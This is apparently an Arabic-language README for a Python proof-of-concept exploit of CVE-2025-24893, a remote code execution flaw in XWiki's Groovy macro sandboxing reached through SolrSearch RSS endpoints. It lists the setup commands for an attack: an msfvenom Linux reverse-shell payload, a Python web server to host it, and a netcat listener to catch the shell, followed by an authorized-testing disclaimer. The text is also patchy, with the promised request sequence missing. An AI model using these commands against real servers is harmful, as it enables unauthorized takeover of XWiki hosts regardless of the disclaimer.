
يستغل الـ PoC الثغرة CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في XWiki سببها عزل (sandboxing) غير سليم في وحدات ماكرو Groovy المعروضة بشكل غير متزامن. تسمح بتنفيذ أوامر عشوائية عبر الحقن في نقاط نهاية SolrSearch المعتمدة على RSS.
المؤلفون: Net.Doge و Infinit3i
هذا السكربت المكتوب بلغة Python يستغل CVE-2025-24893، وهي ثغرة تنفيذ أكواد عن بُعد (RCE) في XWiki ناتجة عن عزل غير صحيح في وحدات الماكرو الخاصة بـ Groovy والتي تُعرض بشكل غير متزامن. وهي تسمح بتنفيذ أوامر عشوائية من خلال الحقن في نقاط نهاية SolrSearch المعتمدة على RSS.
msfvenom)استنسخ السكربت أو نزّله.
تأكد من تثبيت ما يلي:
msfvenom من Metasploitjq (يُستخدم في حمولات bash)شغّل السكربت:
python3 CVE-2025-24893-PoC.py
اختر من القائمة:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
يرسل السكربت التسلسل التالي إلى الهدف:
هذه الأداة مخصصة لأغراض تعليمية وللاختبار المصرح به فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني وغير أخلاقي.